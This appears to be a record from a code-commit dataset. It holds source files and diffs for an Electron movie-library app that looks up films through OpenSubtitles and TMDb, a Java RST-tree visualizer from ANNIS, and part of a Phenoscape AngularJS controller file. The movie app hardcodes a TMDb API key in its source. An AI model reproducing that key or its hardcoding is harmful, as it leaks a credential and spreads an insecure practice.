metacritic: movie.metascore, }, function(err, newDoc) { // Update any new genres newDoc.genres.forEach(function(genre){ if(t.app.state.allgenres.indexOf(genre) == -1) { t.app.state.allgenres.push(genre); t.app.state.allgenres.sort(); t.app.setState({allgenres: t.app.state.allgenres}); } }); t.app.setState({status: {mode: 1, message: "�� Added "+movie.title}}); // Brag to the user t.app.handleChange({}); done(); }); } downloadBackdrop(hash, movie, tmovie, done) { let t = this; this.app.setState({status: {mode: 1, message: "Downloading backdrop for "+movie.title}}); let tbackdrop = tmdb_config['base_url'] + "original" + tmovie['backdrop_path']; img_dl({ url: tbackdrop, dest: path.join(app.getPath('userData'), 'backdrops'), done: function(e, f, i) { t.insertIntoDB(hash, movie, tmovie, done); } }); } downloadPoster(hash, movie, tmovie, done) { let t = this; // Get poster and backdrop urls let tposter = tmdb_config['base_url'] + "w500" + tmovie['poster_path']; img_dl({ url: tposter, dest: path.join(app.getPath('userData'), 'posters'), done: function(e, f, i) { t.downloadBackdrop(hash, movie, tmovie, done); } }); } getTMDbDetails(hash, movie, done) { let t = this; tmdb.find({external_id: movie.imdbid, external_source: 'imdb_id' }).then(function(res) { let tmovie = res.movie_results[0]; t.app.setState({status: {mode: 1, message: "Downloading poster for "+movie.title}}); t.downloadPoster(hash, movie, tmovie, done); }).catch(console.error); } getOMDbDetails(hash, imdbid, done) { let t = this; omdbapi.get({id: imdbid}).then(function(movie) { if(movie.type == 'movie') { t.app.setState({status: {mode: 1, message: "Fetching poster and backdrop of "+movie.title}}); t.getTMDbDetails(hash, movie, done); } else { done(); } }).catch(console.error); } checkInDB(hash, imdbid, done) { let t = this; this.movies_db.find({imdbid: imdbid}).exec(function(err, docs){ if(docs.length > 0) { // Add the bigger file let movie = docs[0]; let bs = t.bytesizeList[t.hashList.indexOf(hash)]; console.log("Movie already exists, update db", movie.title); console.log(movie.bytesize, bs); if(bs > movie.bytesize) { t.movies_db.update( {imdbid: imdbid}, {$set: { hash: hash, fileName: t.fileList[t.hashList.indexOf(hash)], bytesize: t.bytesizeList[t.hashList.indexOf(hash)] } }, {}, function(e, n) { console.log("updated"); done(); }); } else done(); } else { t.getOMDbDetails(hash, imdbid, done); } }); } addMovies() { let t = this; forEachAsync(this.movies, function(next, OSObject, index, array) { if(OSObject['MovieKind'] != 'movie') { next(); return; } t.app.setState({status: {mode: 1, message: "Processing "+OSObject['MovieName']}}); t.checkInDB(OSObject['MovieHash'], "tt"+OSObject['MovieImdbID'], next); }).then(function() { t.app.setState({status: {mode: 0, message: ""}}); console.log("Phew everything is done"); t.unidentified.forEach(function(movie_hash){ console.log(movie_hash, t.fileList[t.hashList.indexOf(movie_hash)]); }); // addUnidentified() }); } osCheckMovieHash(token) { let hlists = [], h = this.hashList.slice(), t = this; while(h.length) { hlists.push(h.splice(0, 200)); } this.app.setState({status: {mode: 1, message: "Identifying your movies..."}}); forEachAsync(hlists, function(next, hlist, index, array) { OpenSubtitles.api.CheckMovieHash(token, hlist).then( (movies_result) => { console.log(movies_result); let r = movies_result['data']; // Convert ugly object into pretty array for (var key in r) { // if (r.hasOwnProperty(key)) if (r[key].hasOwnProperty('MovieHash')) { t.movies.push(r[key]); } else { t.unidentified.push(key); } } next(); }).catch(console.error); // Check hash error }).then(function(){ t.addMovies(); }); } osLogin() { let t = this; this.app.setState({status: {mode: 1, message: "Contacting OpenSubtitles.org server..."}}); // Login to OSDb OpenSubtitles.api.LogIn("", "", "en", "Movie Monkey v1").then((result) => { t.osCheckMovieHash(result['token']); }).catch(console.error); } processFiles(fl) { let t = this; this.fileList = fl.slice(); forEachAsync(fl, function(next, fileName, index, array) { // Calculate Hash and Bytesize of video files t.movies_db.find({fileName: fileName}).exec(function(err, docs) { if(docs.length == 0) { t.app.setState({status: {mode: 1, message: "Processing "+fileName}}); libhash.computeHash( fileName ).then(function(infos){ t.hashList.push(infos['moviehash']); t.bytesizeList.push(infos['moviebytesize']); next(); }); } else { t.fileList.splice(t.fileList.indexOf(fileName), 1); next(); } }); }).then(function(){ // Opensubtitles Login t.osLogin(); }); } }
app/core/moviemonkey.js
const remote = require('electron').remote; const app = remote.app; const path = require('path'); const forEachAsync = require('forEachAsync').forEachAsync; const omdbapi = require('omdbapi'); const tmdb = new (require('tmdbapi'))({ apiv3: '5d357768816b32bc2a1f43a06b62cf4c' }); const img_dl = require('image-downloader'); var libhash = require('opensubtitles-api/lib/hash.js'); var OS = require('opensubtitles-api'); var OpenSubtitles = new OS({ useragent:'Movie Monkey v2', username: '', password: '', ssl: true }); var tmdb_config = {}; // Swap this for formatList var toArray = function(o) { return Object.keys(o).map(k => o[k]) } export default class MovieMonkey { constructor(a, db) { this.app = a; this.movies_db = db; this.hashList = [], this.fileList = [], this.bytesizeList = []; this.movies = [], this.unidentified = []; tmdb.configuration() .then((res) => { tmdb_config = res['images']; }); } insertIntoDB(hash, movie, tmovie, done) { let t = this; t.app.setState({status: {mode: 1, message: "�� Adding "+movie.title}}); t.movies_db.insert({ tmdb_id: tmovie['id'], poster_path: tmovie['poster_path'], backdrop_path: tmovie['backdrop_path'], hash: hash, fileName: t.fileList[t.hashList.indexOf(hash)], bytesize: t.bytesizeList[t.hashList.indexOf(hash)], imdbid: movie.imdbid, imdbrating: +movie.imdbrating, imdbvotes: +movie.imdbvotes.match(/\d/g).join(''), actors: (movie.actors) ? toArray(movie.actors) : null, awards: movie.awards, boxoffice: movie.boxoffice, country: (movie.country) ? toArray(movie.country) : null, directors: (movie.director) ? toArray(movie.director) : null, dvd: movie.dvd, genres: (movie.genre) ? toArray(movie.genre) : null, language: movie.language.split(', '), plot: movie.plot, production: movie.production, rated: movie.rated, released: new Date(movie.released), runtime: +movie.runtime.split(" min")[0], title: movie.title, type: "movie", writers: (movie.writer) ? toArray(movie.writer) : null, year: +movie.year, // rotten: movie.ratings[1].value.split("%")[0], metacritic: movie.metascore, }, function(err, newDoc) { // Update any new genres newDoc.genres.forEach(function(genre){ if(t.app.state.allgenres.indexOf(genre) == -1) { t.app.state.allgenres.push(genre); t.app.state.allgenres.sort(); t.app.setState({allgenres: t.app.state.allgenres}); } }); t.app.setState({status: {mode: 1, message: "�� Added "+movie.title}}); // Brag to the user t.app.handleChange({}); done(); }); } downloadBackdrop(hash, movie, tmovie, done) { let t = this; this.app.setState({status: {mode: 1, message: "Downloading backdrop for "+movie.title}}); let tbackdrop = tmdb_config['base_url'] + "original" + tmovie['backdrop_path']; img_dl({ url: tbackdrop, dest: path.join(app.getPath('userData'), 'backdrops'), done: function(e, f, i) { t.insertIntoDB(hash, movie, tmovie, done); } }); } downloadPoster(hash, movie, tmovie, done) { let t = this; // Get poster and backdrop urls let tposter = tmdb_config['base_url'] + "w500" + tmovie['poster_path']; img_dl({ url: tposter, dest: path.join(app.getPath('userData'), 'posters'), done: function(e, f, i) { t.downloadBackdrop(hash, movie, tmovie, done); } }); } getTMDbDetails(hash, movie, done) { let t = this; tmdb.find({external_id: movie.imdbid, external_source: 'imdb_id' }).then(function(res) { let tmovie = res.movie_results[0]; t.app.setState({status: {mode: 1, message: "Downloading poster for "+movie.title}}); t.downloadPoster(hash, movie, tmovie, done); }).catch(console.error); } getOMDbDetails(hash, imdbid, done) { let t = this; omdbapi.get({id: imdbid}).then(function(movie) { if(movie.type == 'movie') { t.app.setState({status: {mode: 1, message: "Fetching poster and backdrop of "+movie.title}}); t.getTMDbDetails(hash, movie, done); } else { done(); } }).catch(console.error); } checkInDB(hash, imdbid, done) { let t = this; this.movies_db.find({imdbid: imdbid}).exec(function(err, docs){ if(docs.length > 0) { // Add the bigger file } else { t.getOMDbDetails(hash, imdbid, done); } }); } addMovies() { let t = this; forEachAsync(this.movies, function(next, OSObject, index, array) { if(OSObject['MovieKind'] != 'movie') { next(); return; } t.app.setState({status: {mode: 1, message: "Processing "+OSObject['MovieName']}}); t.checkInDB(OSObject['MovieHash'], "tt"+OSObject['MovieImdbID'], next); }).then(function() { t.app.setState({status: {mode: 0, message: ""}}); console.log("Phew everything is done"); t.unidentified.forEach(function(movie_hash){ console.log(movie_hash, t.fileList[t.hashList.indexOf(movie_hash)]); }); // addUnidentified() }); } osCheckMovieHash(token) { let hlists = [], h = this.hashList.slice(), t = this; while(h.length) { hlists.push(h.splice(0, 200)); } this.app.setState({status: {mode: 1, message: "Identifying your movies..."}}); forEachAsync(hlists, function(next, hlist, index, array) { OpenSubtitles.api.CheckMovieHash(token, hlist).then( (movies_result) => { console.log(movies_result); let r = movies_result['data']; // Convert ugly object into pretty array for (var key in r) { // if (r.hasOwnProperty(key)) if (r[key].hasOwnProperty('MovieHash')) { t.movies.push(r[key]); } else { t.unidentified.push(key); } } next(); }).catch(console.error); // Check hash error }).then(function(){ t.addMovies(); }); } osLogin() { let t = this; this.app.setState({status: {mode: 1, message: "Contacting OpenSubtitles.org server..."}}); // Login to OSDb OpenSubtitles.api.LogIn("", "", "en", "Movie Monkey v1").then((result) => { t.osCheckMovieHash(result['token']); }).catch(console.error); } processFiles(fl) { let t = this; this.fileList = fl.slice(); forEachAsync(fl, function(next, fileName, index, array) { // Calculate Hash and Bytesize of video files t.movies_db.find({fileName: fileName}).exec(function(err, docs) { if(docs.length == 0) { t.app.setState({status: {mode: 1, message: "Processing "+fileName}}); libhash.computeHash( fileName ).then(function(infos){ t.hashList.push(infos['moviehash']); t.bytesizeList.push(infos['moviebytesize']); next(); }); } else { t.fileList.splice(t.fileList.indexOf(fileName), 1); next(); } }); }).then(function(){ // Opensubtitles Login t.osLogin(); }); } }
handle multiple files of same movie
app/core/moviemonkey.js
handle multiple files of same movie
<ide><path>pp/core/moviemonkey.js <ide> tmdb.configuration() <ide> .then((res) => { <ide> tmdb_config = res['images']; <del> }); <add> }).catch(console.error); <ide> } <ide> <ide> insertIntoDB(hash, movie, tmovie, done) { <ide> if(docs.length > 0) { <ide> <ide> // Add the bigger file <add> let movie = docs[0]; <add> let bs = t.bytesizeList[t.hashList.indexOf(hash)]; <add> <add> console.log("Movie already exists, update db", movie.title); <add> console.log(movie.bytesize, bs); <add> <add> if(bs > movie.bytesize) <add> { <add> t.movies_db.update( <add> {imdbid: imdbid}, <add> {$set: <add> { <add> hash: hash, <add> fileName: t.fileList[t.hashList.indexOf(hash)], <add> bytesize: t.bytesizeList[t.hashList.indexOf(hash)] <add> } <add> }, <add> {}, <add> function(e, n) { <add> console.log("updated"); <add> done(); <add> }); <add> } <add> else <add> done(); <ide> <ide> } else { <ide>
Java
apache-2.0
b62166ff389d5b74647f0aeb87e080d4ffec8c88
0
zangsir/ANNIS,amir-zeldes/ANNIS,thomaskrause/ANNIS,thomaskrause/ANNIS,zangsir/ANNIS,pixeldrama/ANNIS,pixeldrama/ANNIS,zangsir/ANNIS,korpling/ANNIS,amir-zeldes/ANNIS,korpling/ANNIS,pixeldrama/ANNIS,zangsir/ANNIS,zangsir/ANNIS,korpling/ANNIS,pixeldrama/ANNIS,pixeldrama/ANNIS,pixeldrama/ANNIS,zangsir/ANNIS,korpling/ANNIS,thomaskrause/ANNIS,thomaskrause/ANNIS,korpling/ANNIS,amir-zeldes/ANNIS,thomaskrause/ANNIS,amir-zeldes/ANNIS,amir-zeldes/ANNIS,amir-zeldes/ANNIS
/* * Copyright 2012 Corpuslinguistic working group Humboldt University Berlin. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package annis.gui.visualizers.component.rst; import annis.gui.visualizers.VisualizerInput; import annis.gui.widgets.JITWrapper; import com.vaadin.ui.Panel; import de.hu_berlin.german.korpling.saltnpepper.salt.graph.Edge; import de.hu_berlin.german.korpling.saltnpepper.salt.graph.GRAPH_TRAVERSE_TYPE; import de.hu_berlin.german.korpling.saltnpepper.salt.saltCommon.resources.dot.Salt2DOT; import de.hu_berlin.german.korpling.saltnpepper.salt.saltCommon.sDocumentStructure.SDataSourceSequence; import de.hu_berlin.german.korpling.saltnpepper.salt.saltCommon.sDocumentStructure.SDocumentGraph; import de.hu_berlin.german.korpling.saltnpepper.salt.saltCommon.sDocumentStructure.SStructure; import de.hu_berlin.german.korpling.saltnpepper.salt.saltCommon.sDocumentStructure.STYPE_NAME; import de.hu_berlin.german.korpling.saltnpepper.salt.saltCommon.sDocumentStructure.STextualDS; import de.hu_berlin.german.korpling.saltnpepper.salt.saltCommon.sDocumentStructure.SToken; import de.hu_berlin.german.korpling.saltnpepper.salt.saltCore.SAnnotation; import de.hu_berlin.german.korpling.saltnpepper.salt.saltCore.SGraphTraverseHandler; import de.hu_berlin.german.korpling.saltnpepper.salt.saltCore.SNode; import de.hu_berlin.german.korpling.saltnpepper.salt.saltCore.SRelation; import java.io.FileOutputStream; import java.util.Stack; import org.eclipse.emf.common.util.BasicEList; import org.eclipse.emf.common.util.EList; import org.eclipse.emf.common.util.URI; import org.json.JSONException; import org.json.JSONObject; import org.slf4j.Logger; import org.slf4j.LoggerFactory; /** * The Visualizer Plugin for RST-Visualization. * * This class is used for generating for Generating a JSON-object which is * passed to the JITWrapper. * * Particularity: The pointing relations are provided as dominance edges from * salt which are typed as "edge". * * The RST-Data-Model contains sentences in nodes with annotation value segment. * The segments are descends of nodes with annotation value group and the * relations names are span or multiunc. * * * @author Benjamin Weißenfels <[email protected]> */ public class RSTImpl extends Panel implements SGraphTraverseHandler { private final JITWrapper jit; private final Logger log = LoggerFactory.getLogger(RSTImpl.class); private Stack<JSONObject> st = new Stack<JSONObject>(); // result of transform operation salt -> json private JSONObject result; final String ANNOTATION_NAME = "cat"; final String ANNOTATION_VALUE = "group"; final String ANNOTATION_NAMESPACE = "default_ns"; private SDocumentGraph graph; private String transformSaltToJSON(VisualizerInput visInput) { graph = visInput.getDocument().getSDocumentGraph(); EList<SNode> nodes = graph.getSRoots(); EList<SNode> rootSNodes = new BasicEList<SNode>(); if (nodes != null) { for (SNode node : nodes) { for (SAnnotation anno : node.getSAnnotations()) { log.debug("anno name {}, anno value {}", anno.getName(), anno.getValue()); if (ANNOTATION_NAME.equals(anno.getName())) { rootSNodes.add(node); log.debug("find root {} with {}", anno, ANNOTATION_NAME); break; } } } } Salt2DOT s2d = new Salt2DOT(); s2d.salt2Dot(graph, URI.createFileURI("/tmp/graph_" + graph.getSName() + ".dot")); if (rootSNodes.size() > 0) { graph.traverse(rootSNodes, GRAPH_TRAVERSE_TYPE.TOP_DOWN_DEPTH_FIRST, "jsonBuild", this); } else { log.debug("does not find an annotation which matched {}", ANNOTATION_NAME); graph.traverse(nodes, GRAPH_TRAVERSE_TYPE.TOP_DOWN_DEPTH_FIRST, "jsonBuild", this); } log.debug("result json string: {}", result); try { String path = "/tmp/" + graph.getSName() + ".js"; FileOutputStream out = new FileOutputStream(path); out.write(result.toString().getBytes("UTF-8")); out.close(); } catch (Exception ex) { log.error("writing json failed", ex); } return result.toString(); } public RSTImpl(VisualizerInput visInput) { jit = new JITWrapper(); this.addComponent(jit); jit.setVisData(transformSaltToJSON(visInput)); jit.requestRepaint(); } private JSONObject createJsonEntry(SNode currNode) { JSONObject jsonData = new JSONObject(); StringBuilder sb = new StringBuilder(); EList<SToken> token = new BasicEList<SToken>(); EList<Edge> edges; if (currNode instanceof SStructure) { edges = currNode.getSGraph().getOutEdges(currNode.getSId()); // get all tokens directly dominated tokens and build a string for (Edge e : edges) { SRelation sedge; if (e instanceof SRelation) { sedge = (SRelation) e; } else { log.error("wrong type of edge for {}", e); continue; } /** * Check if the SRelation points at a SToken and in this case check if, * only follow the edge with sType for avoiding double entries of SToken * in the token list */ if (sedge.getSTarget() instanceof SToken && sedge.getSTypes() != null && sedge.getSTypes().size() > 0) { token.add((SToken) sedge.getSTarget()); } } // build strings for (SToken tok : token) { String text = getText(tok); sb.append(text); log.debug("append: {}", text); } } try { jsonData.put("id", currNode.getSId()); jsonData.put("name", token.size() == 0 ? "no token" : sb.toString()); jsonData.put("data", "{}"); } catch (JSONException ex) { log.error("problems create entry for {}", currNode, ex); } return jsonData; } private JSONObject appendChild(JSONObject root, JSONObject node) { try { root.append("children", node); } catch (JSONException ex) { log.error("cannot append {}", node, ex); } return node; } @Override public void nodeReached(GRAPH_TRAVERSE_TYPE traversalType, String traversalId, SNode currNode, SRelation sRelation, SNode fromNode, long order) { st.push(createJsonEntry(currNode)); } @Override public void nodeLeft(GRAPH_TRAVERSE_TYPE traversalType, String traversalId, SNode currNode, SRelation edge, SNode fromNode, long order) { assert st.size() > 0; if (st.size() == 1) { result = st.pop(); } else { JSONObject node = st.pop(); appendChild(st.peek(), node); } } @Override public boolean checkConstraint(GRAPH_TRAVERSE_TYPE traversalType, String traversalId, SRelation incomingEdge, SNode currNode, long order) { EList<String> sTypes; //entry case if (incomingEdge == null) { return true; } // token data structures are not needed if (currNode instanceof SToken) { return false; } /** * check whether the edge has an sType or not, because there are always two * edges in the example rst corpus */ if ((sTypes = incomingEdge.getSTypes()) != null && sTypes.size() > 0) { return true; } else { return false; } } /** * Gets the overlapping token as string from a node, which is direct dominated * by this node. * * @param currNode * @return is null, if there is no relation to a token, or there is more then * one STEXT is overlapped by this node */ private String getText(SToken currNode) { EList<STYPE_NAME> relationTypes = new BasicEList<STYPE_NAME>(); relationTypes.add(STYPE_NAME.STEXT_OVERLAPPING_RELATION); EList<SDataSourceSequence> sSequences = currNode.getSDocumentGraph(). getOverlappedDSSequences(currNode, relationTypes); log.debug("sSequences {}", sSequences.toString()); // only support one text for spanns if (sSequences == null || sSequences.size() != 1) { log.error("rst supports only one text and only text level"); return null; } // check if it is a text data structure if (sSequences.get(0).getSSequentialDS() instanceof STextualDS) { STextualDS text = ((STextualDS) sSequences.get(0).getSSequentialDS()); int start = sSequences.get(0).getSStart(); int end = sSequences.get(0).getSEnd(); return text.getSText().substring(start, end); } // something fundamentally goes wrong log.error("{} instead of {}", sSequences.get(0).getSSequentialDS().getClass().getName(), STextualDS.class.getName()); return null; } }
annis-gui/src/main/java/annis/gui/visualizers/component/rst/RSTImpl.java
/* * Copyright 2012 Corpuslinguistic working group Humboldt University Berlin. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package annis.gui.visualizers.component.rst; import annis.gui.visualizers.VisualizerInput; import annis.gui.widgets.JITWrapper; import com.vaadin.ui.Panel; import de.hu_berlin.german.korpling.saltnpepper.salt.graph.Edge; import de.hu_berlin.german.korpling.saltnpepper.salt.graph.GRAPH_TRAVERSE_TYPE; import de.hu_berlin.german.korpling.saltnpepper.salt.saltCommon.resources.dot.Salt2DOT; import de.hu_berlin.german.korpling.saltnpepper.salt.saltCommon.sDocumentStructure.SDataSourceSequence; import de.hu_berlin.german.korpling.saltnpepper.salt.saltCommon.sDocumentStructure.SDocumentGraph; import de.hu_berlin.german.korpling.saltnpepper.salt.saltCommon.sDocumentStructure.SStructure; import de.hu_berlin.german.korpling.saltnpepper.salt.saltCommon.sDocumentStructure.STYPE_NAME; import de.hu_berlin.german.korpling.saltnpepper.salt.saltCommon.sDocumentStructure.STextualDS; import de.hu_berlin.german.korpling.saltnpepper.salt.saltCommon.sDocumentStructure.SToken; import de.hu_berlin.german.korpling.saltnpepper.salt.saltCore.SAnnotation; import de.hu_berlin.german.korpling.saltnpepper.salt.saltCore.SGraphTraverseHandler; import de.hu_berlin.german.korpling.saltnpepper.salt.saltCore.SNode; import de.hu_berlin.german.korpling.saltnpepper.salt.saltCore.SRelation; import java.io.FileOutputStream; import java.util.Stack; import org.eclipse.emf.common.util.BasicEList; import org.eclipse.emf.common.util.EList; import org.eclipse.emf.common.util.URI; import org.json.JSONException; import org.json.JSONObject; import org.slf4j.Logger; import org.slf4j.LoggerFactory; /** * * @author Benjamin Weißenfels <[email protected]> */ public class RSTImpl extends Panel implements SGraphTraverseHandler { private final JITWrapper jit; private final Logger log = LoggerFactory.getLogger(RSTImpl.class); private Stack<JSONObject> st = new Stack<JSONObject>(); // result of transform operation salt -> json private JSONObject result; final String ANNOTATION_NAME = "cat"; final String ANNOTATION_VALUE = "group"; final String ANNOTATION_NAMESPACE = "default_ns"; private SDocumentGraph graph; private String transformSaltToJSON(VisualizerInput visInput) { graph = visInput.getDocument().getSDocumentGraph(); EList<SNode> nodes = graph.getSRoots(); EList<SNode> rootSNodes = new BasicEList<SNode>(); if (nodes != null) { for (SNode node : nodes) { for (SAnnotation anno : node.getSAnnotations()) { log.debug("anno name {}, anno value {}", anno.getName(), anno.getValue()); if (ANNOTATION_NAME.equals(anno.getName())) { rootSNodes.add(node); log.debug("find root {} with {}", anno, ANNOTATION_NAME); break; } } } } Salt2DOT s2d = new Salt2DOT(); s2d.salt2Dot(graph, URI.createFileURI("/tmp/graph_" + graph.getSName() + ".dot")); if (rootSNodes.size() > 0) { graph.traverse(rootSNodes, GRAPH_TRAVERSE_TYPE.TOP_DOWN_DEPTH_FIRST, "jsonBuild", this); } else { log.debug("does not find an annotation which matched {}", ANNOTATION_NAME); graph.traverse(nodes, GRAPH_TRAVERSE_TYPE.TOP_DOWN_DEPTH_FIRST, "jsonBuild", this); } log.debug("result json string: {}", result); try { String path = "/tmp/" + graph.getSName() + ".js"; FileOutputStream out = new FileOutputStream(path); out.write(result.toString().getBytes("UTF-8")); out.close(); } catch (Exception ex) { log.error("writing json failed", ex); } return result.toString(); } public RSTImpl(VisualizerInput visInput) { jit = new JITWrapper(); this.addComponent(jit); jit.setVisData(transformSaltToJSON(visInput)); jit.requestRepaint(); } private JSONObject createJsonEntry(SNode currNode) { JSONObject jsonData = new JSONObject(); StringBuilder sb = new StringBuilder(); EList<SToken> token = new BasicEList<SToken>(); EList<Edge> edges; if (currNode instanceof SStructure) { edges = currNode.getSGraph().getOutEdges(currNode.getSId()); // get all tokens directly dominated tokens and build a string for (Edge e : edges) { SRelation sedge; if (e instanceof SRelation) { sedge = (SRelation) e; } else { log.error("wrong type of edge for {}", e); continue; } /** * Check if the SRelation points at a SToken and in this case check if, * only follow the edge with sType for avoiding double entries of SToken * in the token list */ if (sedge.getSTarget() instanceof SToken && sedge.getSTypes() != null && sedge.getSTypes().size() > 0) { token.add((SToken) sedge.getSTarget()); } } // build strings for (SToken tok : token) { String text = getText(tok); sb.append(text); log.debug("append: {}", text); } } try { jsonData.put("id", currNode.getSId()); jsonData.put("name", token.size() == 0 ? "no token" : sb.toString()); jsonData.put("data", "{}"); } catch (JSONException ex) { log.error("problems create entry for {}", currNode, ex); } return jsonData; } private JSONObject appendChild(JSONObject root, JSONObject node) { try { root.append("children", node); } catch (JSONException ex) { log.error("cannot append {}", node, ex); } return node; } @Override public void nodeReached(GRAPH_TRAVERSE_TYPE traversalType, String traversalId, SNode currNode, SRelation sRelation, SNode fromNode, long order) { st.push(createJsonEntry(currNode)); } @Override public void nodeLeft(GRAPH_TRAVERSE_TYPE traversalType, String traversalId, SNode currNode, SRelation edge, SNode fromNode, long order) { assert st.size() > 0; if (st.size() == 1) { result = st.pop(); } else { JSONObject node = st.pop(); appendChild(st.peek(), node); } } @Override public boolean checkConstraint(GRAPH_TRAVERSE_TYPE traversalType, String traversalId, SRelation incomingEdge, SNode currNode, long order) { EList<String> sTypes; //entry case if (incomingEdge == null) { return true; } // token data structures are not needed if (currNode instanceof SToken) { return false; } /** * check whether the edge has an sType or not, because there are always two * edges in the example rst corpus */ if ((sTypes = incomingEdge.getSTypes()) != null && sTypes.size() > 0) { return true; } else { return false; } } /** * Gets the overlapping token as string from a node, which is direct dominated * by this node. * * @param currNode * @return is null, if there is no relation to a token, or there is more then * one STEXT is overlapped by this node */ private String getText(SToken currNode) { EList<STYPE_NAME> relationTypes = new BasicEList<STYPE_NAME>(); relationTypes.add(STYPE_NAME.STEXT_OVERLAPPING_RELATION); EList<SDataSourceSequence> sSequences = currNode.getSDocumentGraph(). getOverlappedDSSequences(currNode, relationTypes); log.debug("sSequences {}", sSequences.toString()); // only support one text for spanns if (sSequences == null || sSequences.size() != 1) { log.error("rst supports only one text and only text level"); return null; } // check if it is a text data structure if (sSequences.get(0).getSSequentialDS() instanceof STextualDS) { STextualDS text = ((STextualDS) sSequences.get(0).getSSequentialDS()); int start = sSequences.get(0).getSStart(); int end = sSequences.get(0).getSEnd(); return text.getSText().substring(start, end); } // something fundamentally goes wrong log.error("{} instead of {}", sSequences.get(0).getSSequentialDS().getClass().getName(), STextualDS.class.getName()); return null; } }
Wrote comments.
annis-gui/src/main/java/annis/gui/visualizers/component/rst/RSTImpl.java
Wrote comments.
<ide><path>nnis-gui/src/main/java/annis/gui/visualizers/component/rst/RSTImpl.java <ide> import org.slf4j.LoggerFactory; <ide> <ide> /** <add> * The Visualizer Plugin for RST-Visualization. <add> * <add> * This class is used for generating for Generating a JSON-object which is <add> * passed to the JITWrapper. <add> * <add> * Particularity: The pointing relations are provided as dominance edges from <add> * salt which are typed as "edge". <add> * <add> * The RST-Data-Model contains sentences in nodes with annotation value segment. <add> * The segments are descends of nodes with annotation value group and the <add> * relations names are span or multiunc. <add> * <ide> * <ide> * @author Benjamin Weißenfels <[email protected]> <ide> */
JavaScript
mit
f30d30ad4aa7d2291abc514df9cf813c5e4ae840
0
phenoscape/phenoscape-kb-ui,phenoscape/phenoscape-kb-ui
'use strict'; /* Controllers */ angular.module('pkb.controllers', ['ui.bootstrap']) .controller('AppController', function ($scope, $window, $location, AnatomicalTermSearch, OntologyTermSearch, GeneSearch, Vocab) { $scope.$on('$routeChangeSuccess', function() { $window.ga('set', 'page', $location.url()); $window.ga('send', 'pageview'); console.log("route change: " + $location.url()) }); $scope.clickLink = function () { $scope.clearSearch(); }; $scope.clearSearch = function () { $scope.searchText = null; $scope.clearResults(); }; $scope.clearResults = function () { $scope.anatomyResults = null; $scope.taxaResults = null; $scope.geneResults = null; }; $scope.performSearches = function () { if ($scope.searchText) { $scope.anatomyResults = AnatomicalTermSearch.query({text: $scope.searchText, limit: 20}); $scope.taxaResults = OntologyTermSearch.query({text: $scope.searchText, limit: 20, definedBy: Vocab.VTO}); $scope.geneResults = GeneSearch.query({text: $scope.searchText, limit: 20}); } }; }) .controller('HomeController', function ($scope, AnatomicalTermSearch, CharacterStateSearch, OntologyTermSearch, GeneSearch, Vocab) { }) .controller('AboutPhenoscapeKBController', function ($scope, AnnotationSummary) { $scope.annotationSummary = AnnotationSummary.query(); }) .controller('AboutPhenoscapeController', function ($scope) { }) .controller('AnnotateTextController', function ($scope, $sce, $http, ScigraphAnnotator) { $scope.data = { testInput: "", inputText: "The caudal skeleton of the catfishes, order Siluriformes. American Museum novitates ; no. 2398\nLundberg, John G.; Baskin, Jonathan N.\n\nTo achieve a better understanding of the evolution of catfishes, comparative studies of single character complexes throughout the entire order is believed to be a rewarding approach. A survey of the caudal skeleton of the Siluriformes reveals 10 basic features which, taken together, distinguish catfishes from other fishes. Of these the most diagnostic are: 1) bases of hypurals 3 and 4 fused with a distinct U[subscript]2 chordacentrum in the young and with a usually reduced second ural centrum in the adults; 2) a secondary hypurapophysis; 3) principal rays of the caudal fin fewer than 10+9, with upper principal rays equal to, or fewer than, the lower rays. Within the Siluriformes four features of the caudal skeleton are found to exhibit group specific patterns of variation and trends from primitive to advanced conditions, and may thus be useful in determining relationships: 1. In the trend from the primitive condition of six separate hypurals to the most advanced condition of complete fusion of caudal elements, various groups have reached different structural levels. In this process the sixth hypural is lost. 2. The trend toward elaboration of the sites of caudal muscle origin (hypurapophysis and secondary hypurapophysis) has involved the formation and elaboration of shelves from originally distinct projections, and a subsequent dorsal shift of these sites. 3. While the most primitive principal caudal fin ray number in siluriforms is 9+9, most groups have 8+9. The trend toward a reduction of principal rays always involves loss of an upper ray before loss of a lower so that upper principal rays are never more numerous than lower ones. 4. A separate U[subscript]2 chordacentrum is present in the young of all Ostariophysi except the Loricariidae, Plotosidae, and probably the Chacidae. In the adults of the majority of catfishes a reduced second ural centrum fused with one or more hypurals lies in the cavity on the posterior face of the compound centrum, PU[subscript]1+ U[subscript]l. In some groups the second ural centrum fuses to the compound centrum. In the Loricariidae and Plotosidae the second ural centrum is fused with PU[subscript]1+U[subscript]l, in early development. A separate, well-developed second ural autocentrum occurs in some members of four specialized and unrelated families. This is interpreted as independent redevelopment of a presumedly primitive pre-ostariophysan condition. The advanced conditions of each of these four features of the caudal skeleton tend to occur together in forms which are also regarded as advanced in most other parts of their anatomy. The primitive character states of these features tend to be retained together in a number of families, i.e. Diplomystidae, Ictaluridae, Bagridae, Cranoglanididae, Schilbeidae, Pangasiidae, and Cetopsidae. Advanced features in the caudal skeleton indicate a relationship between the Clariidae and Heteropneustidae, the Doradidae and Auchenipteridae, the Loricariidae, Astroblepidae, and Callichthyidae, and the Plotosidae and Chacidae. The siluriform caudal skeleton shares many features with that of the cypriniforms but it is consistently more advanced. The ostariophysan caudal skeleton is similar to that of the clupeoids, but it resembles the caudal skeleton of the Gonorynchiformes more closely than that of any other group.", annotatedText: "", longestOnly: false } $scope.tabs = { input: {active: true}, output: {active: false} } $scope.runQuery = function (inputText) { $scope.data.annotatedText = ""; $scope.tabs.output.active = true; $scope.annotationPromise = $http.get('http://kb.phenoscape.org/scigraph/annotations', {params: {content: $scope.data.inputText, longestOnly: $scope.data.longestOnly}}).then(function (response) { var text = response.data; $scope.data.annotatedText = text; } ); }; }) .controller('EntityController', function ($scope, $routeParams, $location, 